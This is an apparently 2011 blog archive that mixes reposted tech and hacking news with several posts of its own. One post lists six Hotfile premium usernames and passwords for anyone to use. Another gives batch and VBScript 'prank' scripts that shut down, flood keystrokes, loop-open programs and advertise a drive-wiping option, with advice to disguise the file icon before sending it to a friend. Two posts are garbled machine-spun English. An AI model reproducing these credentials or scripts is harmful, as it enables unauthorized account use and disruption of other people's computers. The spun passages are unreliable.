Selasa, 30 Agustus 2011

premium accounts of hot file

hello friends here i am posting some of the hot-file's premium id/password which i found.





UserName : suaste

Password : suaste

UserName : evrevrev

Password : kvgladio

UserName : astali

Password : 112233

UserName : iaka30

Password : hdkeyfi

UserName : mozgermi

Password : acilweb02

UserName : serres

Password : serres

Now download any thing from hot file with premium account.

Don't forget to say thanks!!

Jumat, 26 Agustus 2011

WikiLeaks publishes tens of thousands more cables

(Reuters) - The WikiLeaks organization said Thursday it was releasing tens of thousands of previously unpublished U.S. diplomatic cables, some of which are still classified.

"We will have released over 100,000 US embassy cables from around the world by the end of today," said a message on WikiLeaks' Twitter feed. The Twitter page is believed to be controlled by Julian Assange, WikiLeaks' controversial Australian-born founder and chief.

The cables which the website said it is dumping onto the public record appear to be from a cache of more than 250,000 State Department reports leaked to the group. WikiLeaks began releasing the cables in smaller batches late last year, but until now had made them public in piecemeal fashion.

Several news organizations around the world, including Reuters, have had complete sets of the cables for months. But for the most part, media outlets have only cited or published cables when publishing specific news or investigative stories based on them.

By late afternoon Thursday, the WikiLeaks website said it had published 97,115 of the 251,287 cables it possesses. It did not specify its motives for releasing such a large amount of material at once.

A person in contact with Assange's inner circle told Reuters the rationale behind the mass release of documents was dismay among WikiLeaks activists that media organizations had lost interest in publishing stories based on the material.

The source described Assange and his associates as "frustrated" at the lack of media interest.

INFORMATION ON ASSANGE

The document release began hours after WikiLeaks revealed on Twitter that Dynadot, a California Internet registrar which had hosted WikiLeaks, had received an order, generated by federal prosecutors in Alexandria, Virginia, requiring it to produce "information on Julian Assange."

WikiLeaks said Dynadot had complied with the order.

According to a copy of the document published by WikiLeaks, U.S. investigators want any "customer or subscriber account information" held by Dynadot since November 1 that relates to Assange, WikiLeaks or the domain name wikileaks.org.

Dynadot and the State Department did not respond to requests for comment.

It is unclear when or how WikiLeaks acquired a copy of the government order to Dynadot, which was dated January 4, 2011. A U.S. official indicated that the document, which was sealed by court order, had not been officially unsealed.

U.S. officials have indicated that prosecutors and a grand jury in Alexandria, have a long-running investigation into WikiLeaks, Assange and others associated with the website.

A few weeks earlier, the same prosecutors sent a similar request to Twitter seeking records of accounts held by Assange, WikiLeaks, and others. They include Bradley Manning, a U.S. Army private being detained for alleged unauthorized disclosures of classified information which was believed to have gone to WikiLeaks.

Last year WikiLeaks and Assange were celebrated after their release of State Department cables, tens of thousands of other secret U.S. files, and a classified video of a contested American military operation in Iraq.

Since then public interest in WikiLeaks has waned. It may have suffered from publicity related to Assange's flight to Britain after sexual misconduct allegations were made against him in Sweden and a subsequent protracted extradition fight. Assange has also publicly fueded with former collaborators.

A person close to Assange said a British appeals court is due to rule early next month on his appeal against Sweden's extradition request. The source was unaware of any link between the latest document dump and the anticipated court decision.

(Additional reporting by Jim Finkle; editing by Christopher Wilson)

(This story has been corrected in paragraph 16 to show Assange was subject to sexual misconduct allegations, not charges). [source]

Kamis, 25 Agustus 2011

Apple holic sad "Steve Jobs resigns from Apple, Cook becomes CEO"

steve job, ceo, steve job chairman SAN FRANCISCO (Reuters) - Silicon Valley legend Steve Jobs on Wednesday resigned as chief executive of Apple Inc in a stunning move that ended his 14-year reign at the technology giant he co-founded in a garage.

Apple shares dived as much as 7 percent in after-hours trade after the pancreatic cancer survivor and industry icon, who has been on medical leave for an undisclosed condition since January 17, announced he will be replaced by COO and longtime heir apparent Tim Cook.

Analysts do not expect Jobs' resignation -- which had long been foreseen -- to derail the company's fabled product-launch roadmap, including possibly a new iPhone in September and a third iteration of the iPad tablet in 2012.

"I have always said if there ever came a day when I could no longer meet my duties and expectations as Apple's CEO, I would be the first to let you know. Unfortunately, that day has come," he said in a brief letter announcing his resignation.

The 55-year-old CEO had briefly emerged from his medical leave in March to unveil the latest version of the iPad and later to attend a dinner hosted by President Barack Obama for technology leaders in Silicon Valley.

Jobs' often-gaunt appearance has sparked questions about his health and his ability to continue at Apple.

"I will say to investors: don't panic and remain calm, it's the right thing to do. Steve will be chairman and Cook is CEO," said BGC Financial analyst Colin Gillis.

Apple shares slid to $357.40 in extended trading after a brief halt. They had gained 0.7 percent to close at $376.18 on the Nasdaq.

Analysts again expressed confidence in the Apple bench, headed by longtime company No. 2 and supply-chain maven Cook.

"Investors are very comfortable with Tim Cook even though Jobs has been a driver of innovation and clearly an Apple success. Tim has shown Apple can still outperform extremely well when he's been acting as CEO," said Cross Research analyst Shannon Cross.

"I don't know if it's a health issue. I don't know if it is a shock. Most likely it was going to happen at some point. Why today versus another day? I don't know."

(Reporting by Poornima Gupta and Edwin Chan; Editing by Gary Hill)

And more awesome article from foxnews :

Steve Jobs resigns from Apple, Cook becomes CEO, Is There an Apple Without Steve Jobs?

Of the various celebrities and pop stars who have achieved household name status, CEOs are hardly included on the list.

Steve Jobs was one of the exceptions.

During his tenure as the head of Apple, Jobs transformed the fledgling tech company into something of a pop sensation, with Jobs as its poster child. Jobs’ keynote speeches -- in which he announced revolutionary products such as the iPod or iPhone -- have long been events comparable to rock concerts, with thousands lining up for hours just to get a glimpse of Apple’s rock star CEO.

So it came as a bit of a shock to the tech world -- and the rest of America, for that matter – when they read the following lines from Jobs’ memo to the company:

“I have always said if there ever came a day when I could no longer meet my duties and expectations as Apple’s C.E.O., I would be the first to let you know. Unfortunately, that day has come.”

Now that Apple’s fearless leader is out of the hot seat, and his successor, Tim Cook, is gearing up to take over, many are now wondering -- will Apple be the same?

Many are scared that the answer is ‘no.’ But overall, the consensus from tech experts is mostly positive. At least for the time being.

“In the short run -- the next two to three years -- the Apple pipeline is so well defined, that I doubt much will change,” Noah Robischon, an executive editor of Fast Company, told FoxNews.com. “But the question is -- what happens to a company after you lose a visionary leader? Does the talent stay? Are you able to innovate the way you did before?”

Many in the tech world have their theories as to why Apple had the amount of success it has had, but the common thread usually involves Jobs’ ability to see his products from the customer’s perspective.

“A lot of tech companies forget that they’re trying to change people’s lives,” Mark Spoonauer, Editor-in-Chief of Laptop Magazine, told FoxNews.com. “Jobs more than any other, understood that. That’s why when you see things like the iPad being advertised, [Apple doesn’t] lead with clock speed or megahertz; it’s more about how it’s going to affect your life. That’s why they’ve been able to ‘out innovate’ the competition.”

And ‘out innovate’ it has.

It’s only appropriate that Steve’s surname is ‘Jobs’ because Apple has seen nothing but growth in the past decade. In September of 2006, Apple had over 20,000 full time and part time employees, a number that has continued to grow over the years with Apple having close to 50,000 men and women in its employ in September of 2010.

The success of the company has almost stood immune to the country’s economic turmoil. But will the loss of Jobs through throw off the momentum?

“I don’t feel like that will change, it’s ingrained in [Apple’s] DNA,” Spoonauer told FoxNews.com. “A lot of people criticize Apple for its closed, walled garden approach. But with Apple, one of the big benefits is that they control both the hardware and software components -- which gives them an advantage over the competition for years to come.”

Now, all eyes are turning to Cook, who took today to address Apple employees.

"I want you to be confident that Apple is not going to change," Cook wrote in an email to employees that was leaked to several tech blogs.

"I cherish and celebrate Apple's unique principles and values. Steve built a company and culture that is unlike any other in the world and we are going to stay true to that-it is in our DNA. We are going to continue to make the best products in the world that delight our customers and make our employees incredibly proud of what they do."

Industry analysts and fans alike will expect Cook keep the momentum going but the comparisons have already started pouring in. Spoonauer predicts that Apple will have to slightly shift its power structure.

“Personalities are going to take a backseat to the products,” Spoonauer told FoxNews.com. “Tim Cook is excellent in terms of his organizational structure. He’s highly analytical, but a lot of people worry he doesn’t have the charisma to follow in Steve Jobs’ footsteps. But Apple has a whole legion of top tier people.”

The key players who are still running the show include Jonathan Ives, the man behind Apple’s iconic design aesthetic, and Scott Forstall, senior vice president of iOS Software. Robischon says Cook needs to focus on keeping the intricate tapestry held together.

“It becomes part of Tim’s job to make sure those people stick around and continue to be the lead innovators,” Robischon told FoxNews.com. “Essentially, Tim doesn’t have the same visionary qualities as Jobs, but part of what he needs to do is foster those within the company.”

Overall, the loss of Jobs isn’t exactly something that other companies haven’t experienced before.

“Bill Gates no longer really runs Microsoft. Warren Buffet is more or less running Berkshire. This isn’t the first time that someone has moved on,” Robischon told FoxNews.com. “So it’s really a question of how the company manages to foster innovation. Building teams that are creative and that aren’t just centered around supply chain management.”

“That’s really a question that every business should be asking.”[source]

Selasa, 23 Agustus 2011

EarthQuake Dc become Trending Topic in facebook and twitter

News in this area the 5.8 magnitude earthquake with the intention of shook Washington, D.C. On Tuesday and was felt in cities right through the East coast exploded online, diffusion speedily via social networking sites like Facebook, Twitter and Foursquare.

Phrases and hashtags correlated to the earthquake, such as "5.8" and "#earthquake" quickly dominated Twitter's trending topics catalog.

Mashable clarification, "Tweets began pouring in from D.C. Near 30 seconds previous to we felt the shake by our center of operations in New York City and well previous to one reports in this area the shake emerged from the media." equally HuffPostLA reports, many West coast users furthermore took to Twitter to tease their East coast counterparts. "Really all this excitement ended a 5.8 shake??? Come on East Coast, we be inflicted with persons pro breakfast made known at this time!!!!" wrote lone user.

We've compiled approximately answer statistics with the intention of illustrate the spike in social media treatment at once following the earthquake.

Inside the minutes at once with today’s earthquake, millions of callers at once flooded the nation’s phone networks, leading to rife confusion as many of them encountered unavailable signals and spotty service.

Then, lone by lone, phone providers took to social media sites to apply their message."To friend loved ones following earthquake, please aid text msgs very than call. Call delays due to temporary bulk calling event," Sprint told its 85,000 followers on Twitter, a reduced amount of than an hour with the shake secure.

"There was approximately arrangement congestion in the East with tremors. Continuing to watch," Verizon Wireless tweeted shortly with with the intention of, to in this area 35,000 followers. Along with AT&T and T-Mobile, which furthermore posted updates on the locate, the nation’s four biggest wireless carriers reached more than 300,000 customers in solely a topic of minutes. Sprint and T-Mobile furthermore posted unconnectedly on Facebook, success a further 1 million users here.

It was waterproof of how much businesses be inflicted with occur to rely on social media tools to instantly get to thousands of customers across uncommon locations, experts understood. When Hurricane Katrina secure six years past, Twitter didn’t exist. Today, it was abuzz with emergency updates from companies like PSE&G, NJ Transit, JetBlue and Amtrak.

photo from nj.com

Kamis, 18 Agustus 2011

Hackers: ‘A 16-year-old can ruin your day now’

Hot awesome News from www.financeasia.com Last week’s attack on the Hong Kong stock exchange’s news website was a wake-up call for the city’s financial community, with internet security vendors reporting a spike in interest from firms asking how they can better protect their systems from hackers.

As with most things, the simplest answer is to spend more money. Linda Hui, a managing director at F5 Networks in Hong Kong, estimates that companies in the city typically spend around 3% of their IT budget on security. “That’s too little,” she said in an interview with FinanceAsia this week. “A reasonable amount would be about 10%.”

The threat from hackers is on the rise, according to a report by Infonetics Research for the first quarter of 2011, with the awareness of threats at an all-time high in what the firm called a “hostile environment”.

“The volume, variety, and complexity of threats continues to grow, and the industry that now supports commercial development of threats is the most obvious culprit; from commercial toolkits to botnet rentals, the business infrastructure that supports attack creation and distribution is growing to support hacker demand,” said Jeff Wilson, principal analyst for security at Infonetics. “This increase in visibility translates into increased budget visibility for security solutions.”

Still, it is easy to ignore the risks. After all, under-spending doesn’t cause any problems — until it is too late. “Security is a journey,” said Hui. “You can never achieve 100%, so it’s hard to prove the value. You can’t measure it. Managers normally make decisions that help them to make more money or that save them money. Security doesn’t fall into either category.”

But the problems at the stock exchange have caused alarm, particularly among financial firms in the city. Hui said that she has since been contacted by banks, securities companies and insurers all asking for advice and reassurance that their systems are protected from a similar attack.

That is hard to guarantee because the kind of attack used against the stock exchange is crude but surprisingly effective — and often used against websites for no other reason than to cause disruption. These so-called denial-of-service attacks typically target a website’s server by overloading it with thousands of simultaneous requests, which can make it impossible for regular visitors to access the site. And, as the stock exchange incident showed, even the simple act of crashing a website can cause big problems.

Security systems, however, have traditionally focused on keeping intruders out of their networks with rule-based firewalls and intrusion prevention systems.

“A firewall will just allow people to come in through the front door, but not though the window or other doors,” said Hui. Sitting in front of the firewall, an intrusion prevention system is like a nightclub bouncer with a list of names, though in this case you can only get in if your name is not on the list.

Such systems offer little defence against sophisticated denial-of-service attacks, which do not happen at the network level. Hackers probe the site in search of information about the type of software and hardware used to serve the web pages, and then exploit known vulnerabilities to take the site down before the traffic even gets to a firewall.

Even so, these attacks have typically focused on obvious targets such as bank websites and credit card payment gateways rather than websites that simply provide information. “The attack on the stock exchange really shows that all websites are exposed to being hacked,” said Hui. “A 16-year-old can ruin your day now.”

To combat such attacks, vendors such as F5 place a switch between websites and the internet that manages traffic and offers security against most denial-of-service attacks at both the network and application level. But the battle against hackers is a constant one. Firms need to audit their security regularly and commit to investing in fixes for known vulnerabilities, said Hui.

On the upside, the high-profile nature of the attack on the stock exchange in Hong Kong has heightened awareness of the problem. Hui noted that the requests for advice she has received since the attack have come from senior managers, reflecting that the problem is being taken more seriously.

Chancellor was targeted by News of the World's hacker, says dominatrix

Dirty tricks claims turn the spotlight on the man who helped bring Andy Coulson to Downing Street

A former dominatrix was targeted by the News of the World's phone hacker Glenn Mulcaire in a tabloid scramble to publish a picture of her posing with George Osborne in front of an alleged line of cocaine, The Independent can reveal.

Natalie Rowe, 47, a former madam who supplied prostitutes to a moneyed clientele, has been shown documents by Scotland Yard detectives showing that the hacker obtained details of her mobile phone number and information about at least one of Mr Osborne's circle of close friends, as newspapers investigated claims of drug use at the height of David Cameron's Conservative leadership bid in 2005.

The heavily redacted document raises the possibility that the mobile phone of the Chancellor of the Exchequer, who was managing Mr Cameron's successful campaign to lead the Tory Party, was also targeted by Glenn Mulcaire and raises fresh questions about Mr

Mr Coulson was editor of the NOTW when its story about Mr Osborne's friendship with Ms Rowe was published on 16 October 2005, including a strong denial from Mr Osborne that he had taken drugs with Ms Rowe. Two years later, the then Shadow Chancellor played a key role in the decision to recruit Mr Coulson as Mr Cameron's spin doctor following his resignation over the hacking scandal.

Mr Osborne was told by Scotland Yard in July that Mr Mulcaire had obtained his private home phone number but said he wanted police to concentrate on other potential victims of phone hacking. The Chancellor last night declined to answer questions from The Independent about whether he ever discussed with Mr Coulson the story he published about him in October 2005, or whether his personal experience of the editor as a tabloid attack dog played a role in the decision to recommend him for a job in Conservative ranks.

Mark Lewis, the lawyer acting for Ms Rowe who now works as a writer and has completed an autobiography which she says will make incendiary revelations about former clients in the upper echelons of the Conservative Party, is preparing a damages claims against News International after it became clear that she was targeted by Mr Mulcaire at a time when she was co-operating with the NOTW's chief rival, the Sunday Mirror.

She told The Independent: "It is clear the News of the World had no boundaries and they would resort to any measures to ensure they had my story. I have always wondered where they got their information. I thought I had a spy in my camp. Instead, it looks as if I was having my privacy invaded."

The former dominatrix found herself sucked into a louche and privileged world of Oxbridge-educated high fliers including Mr Osborne when she started going out with William Sinclair, one of the Tatton MP's university friends, in 1992. Mr Sinclair, the grandson of Winston Churchill's aristocratic air minister in the Second World War, went on to have a child with Ms Rowe in 1994 and was treated for drug addiction.

During the relationship, Ms Rowe regularly met her boyfriend's social set, including Chris Coleridge, the brother of Nicholas, head of Vogue publisher Conde Nast, and Mr Osborne, who was a freelance journalist and later began his journey to the top of British politics as a researcher in Conservative Central Office. More than a decade later, the former madam was the subject of a tabloid bidding war when she approached PR guru Max Clifford offering to sell her story of wild parties, sex and drug taking involving a wealthy fast set whose members included a fast-emerging star of the Conservative Party.

Mr Clifford initially reached a deal with the NOTW but in July 2005 he fell out with the Sunday tabloid, and Ms Rowe's account of her friendship with Mr Osborne was sold to the Sunday Mirror together with a photograph of the fresh-faced future Chancellor, then 22, with his arm around the sex worker. On the table in front of the pair is a roll of paper and a line of white powder which Ms Rowe, who had in the past taken cocaine but had stopped taking the drug because she was pregnant, insists is cocaine.

Mr Osborne has confirmed knowing Ms Rowe, who ran an agency called Black Beauties, supplying prostitutes to clients paying from £350 per hour, but has always been unequivocal in denying that he took cocaine with her. Describing the allegations as "defamatory and completely untrue", he said at the time: "Twelve years ago a friend of mine went out with a woman called Natalie and they had a child together. I met them together occasionally in the autumn of 1993, and it soon became clear that my friend had started to use drugs. He became more and more addicted and I saw his life fall apart. I tried to persuade him to seek treatment. Eventually he did ... That is, and always has been, the sum total of my connection with this woman."

On 16 October 2005, the Sunday Mirror and the NOTW published simultaneous first edition stories using the photograph. Ms Rowe had always wondered how the NOTW knew when her story was being published, as well as several details she had kept to herself, including the fact she used "naughties" as a codeword for cocaine. The answer, it seems, is that her mobile phone – and those of Mr Osborne's social set – were targeted by Mr Mulcaire at least 10 days before the NOTW article appeared.

The Independent understands the Mulcaire document is an A4 handwritten page which carries the date of 6 October 2005 and is headed with the name of Mr Coleridge. The rest has been blanked out by Weeting officers to protect the privacy of other individuals. There is no suggestion that Mr Coleridge was involved in any wrongdoing.

A spokesman for the Chancellor said last night: "We said at the time that the MPS met with George, that he had been notified that his name and home telephone number appeared on notes kept by Glenn Mulcaire. The MPS said they had no further evidence to suggest George's voicemail had been hacked or attempted to be hacked and there has been no subsequent contact."

Ms Rowe, who says she wants to use her case to shine light on the connections between News International and the Conservative Party, said: "I don't know what, if anything, passed between George Osborne and Andy Coulson after all this. But after the way the News of the World went after him, you would have thought he'd want nothing more to do with them or the editor who published the story."

A News International spokesperson said: "News Corporation's Management and Standards Committeeis co-operating fully with the Metropolitan Police and is facilitating their investigation into illegal voicemail interception and related issues at the News of the World."

The story behind the story

The story which appeared on the front pages of the News of the World and the Sunday Mirror on 16 October 2005 could not have come at a worse time for George Osborne and the then Conservative education spokesman, David Cameron.

The future prime minister, at the time bidding to lead the Tory party, had found himself increasingly dogged by challenges to state whether or not he had used drugs during his university days. The publication of a picture of his Notting Hill Set friend and campaign manager alongside a dominatrix and a claimed line of cocaine helped to further stoke the flames of controversy.

Within a few days, however, the two men had successfully batted away the issue as Conservative heavyweights, including Mr Cameron's leadership rival David Davis, offered their support for the right to remain silent. Commentators later suggested that the story about Mr Osborne, which he described as being part of a "smear campaign" against him, may have helped him by denting his image as an out-of-touch "Tory toff".

[Source]

punkt 12 facebook what exactly is

punkt 12 facebook, hacker evolution duality, anonymous hacker
Some people are ask about punkt 12 facebook, what the F*** of this ?
Points since I aspire to necessarily be inflicted with more! Please help me !!!!! Danke.
1 That is the top currently everywhere I think you're disturbed - Signaling your acquaintances with the intention of they are disturbed. | Facebook.
2 Christian Hacker is on Facebook. Join Facebook to join with Christian Hacker and others you could know. Facebook gives public the power to share and makes the planet more commence and gutefrage.Lattice ... 3 - The Advisor convergence pro skilled questions and caring answers to all the handbook Themen.
4 Facebook logo on the basis of the search terms, many public occur to this locate, I think it over with the intention of the theme of "Face Book" but a ration of public interested and approximately of it ...
5 GeoHot: Ex-PS3 and iPhone-hacker is currently on Facebook. The observations to News: GeoHot: Ex-PS3 and iPhone-hacker is currently on Facebook - George Hotz, renowned as a hacker ...
6 Top News. Dodger "App" warns of controls "based reader" pro identity license shall be deemed not safe! Microsoft makes roads abfotografieren.
7 security experts notify with the intention of social networks pro enterprises is a danger with the intention of can hardly control himself. Lengthy aid Hacker leads counting Facebook ...
8 The social arrangement Facebook in the U.S., a software lone pro visage recognition, which allows users in the prospect, their acquaintances, uploading pictures involuntarily ...
9 inside the dispute ended privacy on Facebook, the company reins try again to make into the hands and announces improvements pro the appearance week by the ...
10 Anonymous takes to arrange made known hostile to Facebook> General> Anonymous, Facebook, hackers, arrangement surgical procedure

The day after day news and gossip, "9th eminent 2011 | Author: The hacker assemble Anonymous brings to arrange hostile to the social networking locate Facebook. With "Operation Facebook," they aspire on 5 November 2011 death of service seal. Inside an Internet record they announce their aim to participate on the call and explain the reasons pro their "operation". According to the hacker does not destroy the user, but furthermore care for from the scheming of the arrangement. The masters

Facebook Average is an mean fan growth map calculated across a generous sample assemble of Facebook pages.
Trend data shows whole fans, and weekly fan growth, all updated on a day after day basis. Some pages could trade show swift jumps in fan facts. Typically, this is a upshot of leaf consolidations. For model an unofficial leaf pro a star could make clogged, with fans migrated in bulk to the authoritative leaf.

From many source

Rabu, 17 Agustus 2011

Hackers gather in Germany for computing 'Woodstock'

With hammocks hanging from trees and the smell of marijuana lingering in the air, the summer camp organised by Germany's Chaos Computer Club (CCC) almost felt like Woodstock.

But instead of hippies it was computer hackers who had flooded this year's summer camp. And instead of flower power the talk was of the latest controversies in cyberspace, especially the legality of hacking and the role of famed whistleblower site WikiLeaks.

Organised by the CCC, which fights for freedom of information through hacking, the camp takes place every four years and is a venue for computer fans to meet, debate hacking issues and try out new technology.

Hosted over four days last week at a former Soviet base in Finowfurt, north of Berlin, the camp attracted an estimated 3,500 hackers from 50 countries, up from 2,300 people in 2007, CCC spokesman Frank Rieger said.

Mixing conferences with workshops with titles such as "Cyberpeace and datalove", the camp attracted a young and mostly male crowd, united by the CCC slogan "Protect private data, exploit public data".

But beyond the "peace and love" atmosphere, the hacking community was split on several issues.

"Hackers are very individualistic, they don't like being put in boxes," explained Rieger.

One hot-button topic was Julian Assange's controversial agenda, following the release of hacked US diplomatic cables this year which again divided opinion on the whistleblower site and its founder.

Former WikiLeaks spokesman Daniel Domscheit-Berg, now a self-sworn enemy of Assange, used the Finowfurt event to announce the launch of his own platform, OpenLeaks, and challenged CCC members to hack it.

"He wants to use us as a credibility voucher," said the CCC's Andy Mueller-Maguhn, a close friend of Assange who stands out from the hacking crowd with his pressed shirt and briefcase.

"It's very annoying. By definition, our movement is an open one," he said, "but sometimes one has to set limits."

Another issue up for debate was the legality of hacking, where many agree the lines are blurred.

Samuel Lesueur of the French hacker group Ecolab said he has always chosen "the legal route" but admits that "out of the boundaries of the association, everyone does as they please".

"Anything that's illegal has no legitimacy to me," said Jeremie Zimmermann, from "La Quadrature du Net", a French group promoting Internet freedom.

But Zimmermann admits to campaigning against laws in France that ban downloading data from the Internet and downplayed spectacular hacking attacks by the groups Anonymous and LulzSec.

"Anonymous and LulzSec, that's not terrorism, that's merely vandalism," he said.

LulzSec claimed responsibility for a 50-day rampage earlier this year against international businesses and government agencies, including the Central Intelligence Agency (CIA), the US Senate and electronics giant Sony.

The group has since disbanded.

Last week another hacker group attacked the websites of numerous US police agencies in protest at the arrest of a number of their peers, including hackers from the group Anonymous.

But it was not all philosophical debate at Finowfurt.

"I want to hack my girlfriend's webcam in order to spy on her," confessed one young man, who did not want to give his name.

"But I couldn't find anyone to tell me how to do it," he added, looking dejected.

[source]

Hackers Attack Two BART Websites Following Prevented Protest



The Bay Area Rapid Transit (BART) system is finding itself in hot water after a cell phone service was shut down last Thursday, Aug. 11, in order to stop a planned protest from occurring. BART acknowledged the report that the cell phone towers were taken down shortly after the incident.

“Organizers planning to disrupt BART service on August 11, 2011 stated they would use mobile devices to coordinate their disruptive activities and communicate about the location and number of BART Police,” a statement the website of BART said. “A civil disturbance during commute times at busy downtown San Francisco stations could lead to platform overcrowding and unsafe conditions for BART customers, employees and demonstrators. BART temporarily interrupted service at select BART stations as one of many tactics to ensure the safety of everyone on the platform.”

The cell phone network runs from Balboa Park Station through Transbay Tube. BART is receiving criticism for blocking the service and the incident was even compared to recent Middle Eastern tactics where dictators stopped broadcasting Internet services in order to stop protests from happening.

“All over the world, people are using mobile devices to protest oppressive regimes, and governments are shutting down cell phone towers and the Internet to stop them,” Michael Risher, a staff attorney for the American Civil Liberties Union of Northern California, said. “It’s outrageous that in San Francisco, BART is doing the same thing.”

Organizers had planned to protest the July 3 shooting of Charles Blair Hill, who was carrying a knife in a downtown BART station before he was shot by police.

Since the incident in question, the hacker group Anonymous have hacked into the BART train service website and have released sensitive customer data in what many are calling “their retaliation” to preventing the protest and their first amendment rights.

The information leaked contains information such as the names of passwords of more than 2,000 people that use the service, according to the San Francisco Chronicle.

In a statement, the computer hacking group noted that the website had no security and that an “8-year-old with an Internet connection” could have been able to hack it. “We are Anonymous, we are your citizens, we are the people, we do not tolerate oppression from any government agency,” the hackers said.

Following the incident, BART spokesman Jim Allison issued the following statement: “We’re going to take steps to make sure our customers are safe. The interruption of cell phone service was done Thursday to prevent what could have been a dangerous situation. It’s one of the tactics we have at our disposal. We may use it; we may not. And I’m not sure we would necessarily let anyone know in advance either way.”

Since hacking their first website earlier in the week, the hacking group has also hacked into the database belonging to the BART Police Officers Association, with sensitive database information from that website also being posted online. Full names, e-mail addresses, home addresses, and passwords were leaked.

“These people are criminals and we’re going to forward this information to the FBI,” BART union president, Jesse Sekhon, told the San Francisco Chronicle. “These people need to be brought to justice. They can’t be terrorizing people.”

“BART police officers are used to working in dangerous situations, but they aren’t used to having their family members exposed to danger,” BART’s Deputy Police Chief Ben Farrow told Bay City News.

On Monday, many took part in what was described as a civil protest following the prevented protest last week. Four San Francisco subway stations were closed because of it and people that were going to use the service had to find an alternative station or another way home.

The @OpBART Twitter account notes that a second round of protests will take place this upcoming Monday at 5PM at the Civic Center station.

Read more [source]

Collection of CMD annoying & tricky VB scripts

 Hello friends here i am posting some of the CMD annoying and tricky VB scripts.
Its not a virus but you can consider it as a virus.

1 Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

2 Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3 Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

4 Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5 Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9 Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

Senin, 15 Agustus 2011

A Writer's Reference with 2009 MLA and 2010 APA Updates

A Writer’s Reference is the most widely adopted college handbook ever published. The new edition is available in a classic version that provides more help with academic writing, serves a wider range of multilingual students, and lends more support for college research — all in an easy-to-use quick-reference format. Now for all the ways you teach your course, you can choose the classic version or choose from among 4 additional versions with varied content.
  • A Writer’s Reference with Exercises is tailor-made for classroom use or for additional grammar practice with 86 integrated exercise sets.
  • A Writer’s Reference with Writing in the Disciplines provides help for college writing beyond composition with advice and models in six academic disciplines.
  • A Writer’s Reference with Writing about Literature includes an entire tabbed section on interpreting and writing about works of literature, with two annotated student essays.
  • A Writer’s Reference with Extra Help for ESL Writers includes an entire tabbed section for nonnative speakers of English; it offers targeted advice and strategies for college writing and research.

About the Author

DIANA HACKER's handbooks, used at almost half of the colleges and universities in the country, are the most widely adopted in America. A member of the English faculty at Prince George's Community College in Maryland for almost 35 years, Diana Hacker personally class-tested her handbooks with nearly four thousand students. Diana Hacker's other handbooks, all published by Bedford/St. Martin's, include The Bedford Handbook (2006); Rules for Writers (2004); andA Pocket Style Manual (2004).

ABOUT THE CONTRIBUTING AUTHORS

NANCY SOMMERS, who has taught composition and directed composition programs for thirty years, now teaches writing in the Graduate School of Education at Harvard University. A two-time Braddock Award winner, Sommers is well-known for her research and publications on student writing. Her recent work involves a longitudinal study of undergraduate writing. Nancy Sommers is co-author of Fields of Reading, Ninth Edition (2010) for Bedford/St. Martin’s.

TOM JEHN teaches composition and directs the writing across the disciplines program at Harvard University. A recipient of numerous teaching awards both at Harvard and at the University of Virginia, he also leads professional development seminars on writing instruction for public high school teachers through the Calderwood Writing Fellows Project.

JANE ROSENZWEIG, a published author of fiction and non-fiction, teaches composition and directs the writing center at Harvard University. She has also taught writing at Yale University and the University of Iowa.

